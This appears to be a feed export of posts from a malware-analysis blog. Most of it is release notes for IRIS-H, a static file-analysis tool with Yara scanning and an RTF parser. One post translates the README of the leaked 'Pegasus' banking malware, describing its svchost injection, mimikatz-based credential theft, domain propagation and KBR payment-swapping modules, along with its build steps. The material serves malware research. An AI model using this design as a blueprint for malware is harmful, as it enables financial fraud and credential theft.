<span style="font-family: "trebuchet ms" , sans-serif;">The page now includes submission type indicator - Public/Private</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2i3VUsdiIX40DgSHogzwgjOYLDGi8jcKswsas3Ixo7fXmiI9Rm3rX-mcj3p_qEh62rwbIwF4oSgQbXbhQw2WLJzQN7wMyKbvSQlEwTPKSzIabJWo1hYhnwnv7A_KmCmoaYJ6UyU-Bxkro/s1600/Screenshot+from+2018-08-06+18-23-15.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="71" data-original-width="390" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2i3VUsdiIX40DgSHogzwgjOYLDGi8jcKswsas3Ixo7fXmiI9Rm3rX-mcj3p_qEh62rwbIwF4oSgQbXbhQw2WLJzQN7wMyKbvSQlEwTPKSzIabJWo1hYhnwnv7A_KmCmoaYJ6UyU-Bxkro/s320/Screenshot+from+2018-08-06+18-23-15.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H submission type indicator - Public</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2BxMshvuBBfWwna5NBaP6iqReZZFJGJxCnVVYhgW1io7PgzwvH_SmQNh73BoSnrCaK3nXlMrhQCV4rTpHXs5dzuVH3GGQynFPkFt7_CsS12EElCYtq5or3RWXDiNzuqSOys4Sgy8Bvi5r/s1600/Screenshot+from+2018-08-06+19-11-54.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="64" data-original-width="369" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2BxMshvuBBfWwna5NBaP6iqReZZFJGJxCnVVYhgW1io7PgzwvH_SmQNh73BoSnrCaK3nXlMrhQCV4rTpHXs5dzuVH3GGQynFPkFt7_CsS12EElCYtq5or3RWXDiNzuqSOys4Sgy8Bvi5r/s320/Screenshot+from+2018-08-06+19-11-54.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H submission type indicator - Private</td></tr>
</tbody></table>
<div>
<b style="color: #3d85c6; font-family: "Trebuchet MS", sans-serif; font-size: small;">Report Page</b></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Content displayed on the report page has been re-worked and majority of the generic information has been removed.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTd1foylOJG1X-V9asKCQcEBjN7EaCLzl1Rx8MrNHXZshtGw9taxxPoW2QJ2vS9kM28cTNC0cvjsEOvEjUL_u6Ndg6hTloM3gGfbLTqd0TwL7BlZz3hmGkOh6DPG19sPTRX2LGMv9jejM0/s1600/Screenshot+from+2018-08-06+18-30-29.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="821" data-original-width="1600" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTd1foylOJG1X-V9asKCQcEBjN7EaCLzl1Rx8MrNHXZshtGw9taxxPoW2QJ2vS9kM28cTNC0cvjsEOvEjUL_u6Ndg6hTloM3gGfbLTqd0TwL7BlZz3hmGkOh6DPG19sPTRX2LGMv9jejM0/s320/Screenshot+from+2018-08-06+18-30-29.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Report page example</td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">The report page now supports multiple reports display using separate report page tabs. Where the same functionality can be achieved with opening separate browsing session tabs in the Internet browser application, this feature serves as a good alternative.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5h48xbIdmk28JAkMYbAyVnATEBOY3PefwHdekJXPLgUyCAAbRwq2zukw7ouS3u1K30B_dYpy2ee-9isWBeoWGO9gABb0CkU4zRmphyphenhyphenhnLXs6x5H9e7f80dv1HWkEi22Y1JhjfQfkX1TVP/s1600/Screenshot+from+2018-08-06+18-35-13.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="231" data-original-width="717" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5h48xbIdmk28JAkMYbAyVnATEBOY3PefwHdekJXPLgUyCAAbRwq2zukw7ouS3u1K30B_dYpy2ee-9isWBeoWGO9gABb0CkU4zRmphyphenhyphenhnLXs6x5H9e7f80dv1HWkEi22Y1JhjfQfkX1TVP/s320/Screenshot+from+2018-08-06+18-35-13.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Report page - tabs view example</td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><b><u>NOTE</u></b>: The memory consumed by the tool depends on the number of reports opened at the same time. Use Internet browser page refresh functionality to remove all report tabs except the currently active one.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><b>Workbench Page</b></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Workbench is a new data view type added in this release. It can be accessed through 'Report' page navigation sub-menu or through the main interface side bar if any workbench data is already loaded.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxfS6NvT0IfTvRvDzHPL6FYf9GMy4RXE7CkuaBtlS6clZoE8L4uV1q50TBeaIcB9TJ7m12E_Av_A8HmvdPrFmWkBCXvkRFs_5ABMMyoSt8cxrpxCa5Z9s1Sndw8hcuHR8Nrd-Scb5CdoyJ/s1600/Screenshot+from+2018-08-06+19-02-09.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="318" data-original-width="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxfS6NvT0IfTvRvDzHPL6FYf9GMy4RXE7CkuaBtlS6clZoE8L4uV1q50TBeaIcB9TJ7m12E_Av_A8HmvdPrFmWkBCXvkRFs_5ABMMyoSt8cxrpxCa5Z9s1Sndw8hcuHR8Nrd-Scb5CdoyJ/s1600/Screenshot+from+2018-08-06+19-02-09.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Access 'Workbench' view from 'Report' page</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">The 'Workbench' page allows for the submitted file content </span><span style="font-family: "trebuchet ms" , sans-serif;">browsing</span><span style="font-family: "trebuchet ms" , sans-serif;"> </span><span style="font-family: "trebuchet ms" , sans-serif;">using its structural view. The file content is displayed in HEX and ASCII formats.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL3SzGCB5j7lgkVuNWjks_1F2BVAil7qp8t5_59z5rv8XO5MVzOiH72JpNyCW2ichiqT7BBzFU-Lt03gyZgUQlJMTrRELV3LHjyaCq_vIkEjxIl6YNjN8-lQOw-MSXtkC-60Oq3RAqAdJ3/s1600/Screenshot+from+2018-08-06+18-49-59.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="822" data-original-width="1600" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL3SzGCB5j7lgkVuNWjks_1F2BVAil7qp8t5_59z5rv8XO5MVzOiH72JpNyCW2ichiqT7BBzFU-Lt03gyZgUQlJMTrRELV3LHjyaCq_vIkEjxIl6YNjN8-lQOw-MSXtkC-60Oq3RAqAdJ3/s320/Screenshot+from+2018-08-06+18-49-59.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Workbench Page example</td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">The 'File Structure' tree view on the left hand side is interact-able as well as the HEX view of the data. When entry in the tree view is selected the corresponding HEX and ASCII pieces of data are scrolled into the view. HEX view is also interact-able the same way except for the scrolling part.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPTDxN3ccFJblIwMEdt0NazQApdSGSTNHxxmvopRxaZIE_wznL_TZWI1ORfmqVNpuNzvi8sXb9z4afeVoyVihQObRfHlNwXR9ws5b3a5NCVBGQYpX8_MGqf2goriyJNzeZIMLBSp9-oiXa/s1600/Screenshot+from+2018-08-06+18-52-52.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="460" data-original-width="1600" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPTDxN3ccFJblIwMEdt0NazQApdSGSTNHxxmvopRxaZIE_wznL_TZWI1ORfmqVNpuNzvi8sXb9z4afeVoyVihQObRfHlNwXR9ws5b3a5NCVBGQYpX8_MGqf2goriyJNzeZIMLBSp9-oiXa/s320/Screenshot+from+2018-08-06+18-52-52.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Workbench Page - file content browsing example</td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span><span style="font-family: "trebuchet ms" , sans-serif;">On each tree or HEX views interaction, c</span><span style="font-family: "trebuchet ms" , sans-serif;">ontent of the 'Description' panel on the right hand side is updated with corresponding data description as per official file format specification.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Download function is available for each individual file component as well as for the submitted file itself. The 'Download' button can be found on</span><span style="font-family: "trebuchet ms" , sans-serif;"> </span><span style="font-family: "trebuchet ms" , sans-serif;">the right hand side </span><span style="font-family: "trebuchet ms" , sans-serif;">in each workbench panel header.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><b><u>NOTE</u></b>: This feature is currently available for files in 'Shell Link Binary' format (LNK) only.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><b>General UI features</b></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Akveo Nebular UI offers many features to customize the interface look. All of the customization options are available through 'Settings' sub-menu located in the top right corner.</span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9kv7k3pCHV1qv2ew4Gtf48NaJArBzfEKlBRVw0xa3PFnAf0est4EeYkBJgxxp5fPHC5WaRP-lYCL7MujUEtXGhKlOMCiGflYgjfHAsM7wU7bgW65sfcPg5OKrab24A7g-Ty5SHGX_oOD7/s1600/Screenshot+from+2018-08-06+19-29-14.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="496" data-original-width="133" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9kv7k3pCHV1qv2ew4Gtf48NaJArBzfEKlBRVw0xa3PFnAf0est4EeYkBJgxxp5fPHC5WaRP-lYCL7MujUEtXGhKlOMCiGflYgjfHAsM7wU7bgW65sfcPg5OKrab24A7g-Ty5SHGX_oOD7/s320/Screenshot+from+2018-08-06+19-29-14.png" width="85" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Interface customization settings</td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Where all of them are self-explanatory, I'd like to single out my favorite one - UI Theme customization. It allows for the interface theme on-the-fly change. There are currently 3 themes available - light, cosmic and corporate. Corporate theme is the default one, though my personal favorite is cosmic.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3k9HXNWzhsVP14RF-NxwpN3n_pBevfDw7stIZ2wzUynkqNVY8pZATH8Tuwk0vxqV6clt6w_h3sYhBWJVi5OkRGYwQ7Q7VA2P8HhzvAzLcu-EDYddf2FHUgVcVjz3ZFd4BsatAzz0GDi1t/s1600/Screenshot+from+2018-08-06+19-50-25.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="828" data-original-width="1600" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3k9HXNWzhsVP14RF-NxwpN3n_pBevfDw7stIZ2wzUynkqNVY8pZATH8Tuwk0vxqV6clt6w_h3sYhBWJVi5OkRGYwQ7Q7VA2P8HhzvAzLcu-EDYddf2FHUgVcVjz3ZFd4BsatAzz0GDi1t/s320/Screenshot+from+2018-08-06+19-50-25.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H with Cosmic UI Theme applied</td></tr>
</tbody></table>
<div>
<span style="color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 16px;"><b>Yara Rules Support + 'External Intelligence'</b></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">New addition to the static analysis engine. IRIS-H will now scan the submitted files and their partial content with Yara rules. The scanning engine is based on <a href="https://github.com/nospaceships/node-yara" rel="nofollow" target="_blank">node-yara</a> module developed by <a href="https://twitter.com/NoSpaceships" rel="nofollow" target="_blank">NoSpaceships</a>.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Current Yara rules set consist of the rules <a href="https://github.com/Neo23x0/signature-base/tree/master/yara" rel="nofollow" target="_blank">developed</a> and collected by <a href="https://twitter.com/cyb3rops" rel="nofollow" target="_blank">Florian Roth</a> for his Nextron Systems <a href="https://www.nextron-systems.com/compare-our-scanners/" rel="nofollow" target="_blank">scanners</a>.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">'Report' page now includes a new section called 'External Intelligence & Automated Scanning' that displays any Yara matches.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimrC0e0l8YNVsnCpoqxwsUEbZVoKcr0_jhWjrkcFf7U8fIsy8I-D3TZXLR5rnzmNfaRmsXpxv7MzSMp_1wDZWbLlGaALw14YCUvSFy4Om7rI6BqsFMzryr_dn41MxEL-aS0yUL3Ete8nPy/s1600/Screenshot+from+2018-08-08+08-25-29.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="335" data-original-width="702" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimrC0e0l8YNVsnCpoqxwsUEbZVoKcr0_jhWjrkcFf7U8fIsy8I-D3TZXLR5rnzmNfaRmsXpxv7MzSMp_1wDZWbLlGaALw14YCUvSFy4Om7rI6BqsFMzryr_dn41MxEL-aS0yUL3Ete8nPy/s320/Screenshot+from+2018-08-08+08-25-29.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Report Page - Yara match example</td></tr>
</tbody></table>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
This section will also display information collected from external sources. This feature is currently under development.</div>
<div>
<br /></div>
<div>
<b><span style="color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 16px;">Personal Service User Account</span></b></div>
<div>
<br /></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">IRIS-H now supports personal user accounts. Since this new feature is still in testing, the public registration process is currently unavailable, however user accounts can be provisioned upon a request(hit me up on Twitter).</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Current personal account design provides the same features as the public account with the exception of making analysis report data private and available only to the user logged in with the account the submitted file was processed under.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">There is no other difference in the features set.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 16px;"><b>GitHub Repository</b></span></div>
<div>
<br /></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://github.com/malwageddon/iris-h" rel="nofollow" target="_blank">Repository</a> has been created on GitHub to enable issues tracking. Issue reports and feature suggestions are much appreciated.</span><br />
<br />
<span style="background-color: white; color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: large;"><b>Credits</b></span><br />
<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif;">This project wouldn't be where it is now without such a great support from the InfoSec community and all those highly talented people who create beautiful tools and applications that help and inspire a curious mind. There are no words to describe how much I value any collaboration that happens in those communities - you can never stop learning.</span></span><br />
<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif;">Special kudos go to:</span></span><br />
<br />
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">InfoSec community (honest to creators, you are machines. I envy your energy!)</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Angular community on stackoverflow.com (you're a mind-blowing folks)</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Individuals who supported the project with their valuable feedback and file samples. I simply can't post such a big list here and I do not support fame leeching, but you know who you are. I endlessly value our relationships.</span></li>
</ul>
<div>
<span style="font-family: trebuchet ms, sans-serif;"><br /></span></div>
Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-30080538070592066742018-07-11T13:50:00.002+01:002018-07-11T19:00:22.598+01:00You only had one job...Brief translation for some files located in project Pegasus source code leak...<br />
<br />
<b><span style="color: #3d85c6;">\Pegasus\README.TXT</span></b><br />
<br />
Project Pegasus - Content brief description<br />
<br />
Pegasus - complex structured project for x32 and x64 platforms.<br />
Installer injects system kernel into svchost process memory and deletes the source file.<br />
<br />
The initial installer passes the execution controls in the following way:<br />
Shellcode -> InstallDispatcherDll<br />
<br />
New process passes the execution controls in the following way:<br />
Shellcode -> WorkDispatcherDll -> all other modules<br />
<br />
If installing over existing deployment, the build ID check is performed and if found below or equal the current version the installation is canceled.<br />
<br />
Modules functionality will take a while to explain and describe in here. If absolutely necessary look at the corresponding source code - the description there is well structured and documented.<br />
<br />
Microsoft Visual Studio 2013+ and PHP Tools for Visual Studio from Devsense are required to build the project.<br />
<br />
Folders description:<br />
<br />
<span style="white-space: pre;"> </span>binres<br />
Compiled modules and other code for x32 and x64 platforms<br />
<span style="white-space: pre;"> </span><br />
<span style="white-space: pre;"> </span>BUILDS<br />
Final installers for both platforms, debug and release version depending on the sub folder it's stored in.<br />
<br />
<span style="white-space: pre;"> </span>inc<br />
Program libraries used by different sub-projects.<br />
<br />
<span style="white-space: pre;"> </span>InstallDispatcherDll<br />
Installer module, performs injects into a new process<br />
<br />
<span style="white-space: pre;"> </span>InstallerExe<br />
Initial installer project<br />
<br />
<span style="white-space: pre;"> </span>lib<br />
Files necessary for compiling the project without MSVCRT<br />
<br />
<span style="white-space: pre;"> </span>LZ4_pack<br />
Resource packing utility<br />
<br />
<span style="white-space: pre;"> </span>mod_CmdExec<br />
Command execution module using the panel(new process, console command, etc)<br />
<br />
<span style="white-space: pre;"> </span>mod_DomainReplication<br />
Domain propagation module<br />
<br />
<span style="white-space: pre;"> </span>mod_KBRI<br />
KBR payment swapping module<br />
<br />
<span style="white-space: pre;"> </span>mod_KBRI_hd<br />
Injector module that intercepts KBR data exchange process and receives swapped data from mod_KBRI<br />
<br />
<span style="white-space: pre;"> </span>mod_LogonPasswords<br />
Password extraction module, re-written and patched mimikatz code<br />
<br />
<span style="white-space: pre;"> </span>mod_NetworkConnectivity<br />
Communication module, including using pipes for machines with restricted network access<br />
<br />
<span style="white-space: pre;"> </span>RemoteServiceExe<br />
Special Executable file that is uploaded to a remote system in case of domain propagation scenario.<br />
<br />
<span style="white-space: pre;"> </span>shared<br />
Common header and configuration files<br />
<br />
<span style="white-space: pre;"> </span>Shellcode<br />
Attached libraries load and execution shellcode<br />
<br />
<span style="white-space: pre;"> </span>tools<br />
Project assembly scripts and utilities<br />
<br />
<span style="white-space: pre;"> </span>WEB<br />
Client part of the admin panel, integrated into Studio project<br />
<br />
<span style="white-space: pre;"> </span>web-adminpart<br />
Admin panel, copy from the development server<br />
<br />
<span style="white-space: pre;"> </span>WorkDispatcherDll<br />
System kernel<br />
<br />
In general case,<br />
\shared\config.h is configured first<br />
\tools\MAKE_INSTALLERS.BAT with Release or Debug parameter assembles the rest<br />
\BUILDS\ folder will contain the final build<br />
<br />Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-65335023680705680252018-03-07T21:47:00.000+00:002018-03-07T22:03:48.390+00:00IRIS-H (alpha): Added RTF files parser module<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: new feature</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API, UI</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API side code logic(parser) has been added to allow for RTF files processing. Currently, the new parser provides basic data extraction capabilities. UI side 'Submission' and 'About' pages have been updated to reflect the new changes.</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: Second development iteration.</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><b>Known Issues</b>: Some data obfuscation types are not supported.</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">New code logic has been added to IRIS-H to allow for Rich Text Format (RTF) files processing. The 'Submission' page will now accept RTF file upload and pass it for further processing which includes the following:</span><br />
<br />
<ul>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">extract document metadata</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">identify and parse embedded objects</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">extract font table</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">detect languages used in the document</span></span></li>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">provide description for all extracted data</span></span></li>
</ul>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">Currently, the parsing module only provides essential processing. The module was tested with a good number of malicious RTF files and seems to be relatively stable handling the majority of obfuscation techniques. Thanks to <a href="https://twitter.com/James_inthe_box" rel="nofollow" target="_blank">@James_inthe_box</a> for providing the samples!</span></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #3d85c6; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><b>Example Reports</b></span></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><a href="https://iris-h.services/report/c3d93db2aa5aaf4f821548e15d79946e" rel="nofollow" target="_blank">https://iris-h.services/report/c3d93db2aa5aaf4f821548e15d79946e</a> - CVE-2017-11882</span></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><a href="https://iris-h.services/report/247f2739e20053ea397b748c35398c63" rel="nofollow" target="_blank">https://iris-h.services/report/247f2739e20053ea397b748c35398c63</a> - OLE Autolink update using SoapMoniker</span></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><a href="https://iris-h.services/report/fea6546e3299a31a58a3aa2a6b7060c9" rel="nofollow" target="_blank">https://iris-h.services/report/fea6546e3299a31a58a3aa2a6b7060c9</a> - ASLR/DEP evasion using msvbvm60.dll (СVE-2017-11826 precursor</span></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">)</span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span></div>
<div>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span></div>
Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-13517792986361995012018-02-05T18:33:00.000+00:002018-03-07T22:03:32.338+00:00IRIS-H (alpha): Added ZIP files support<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
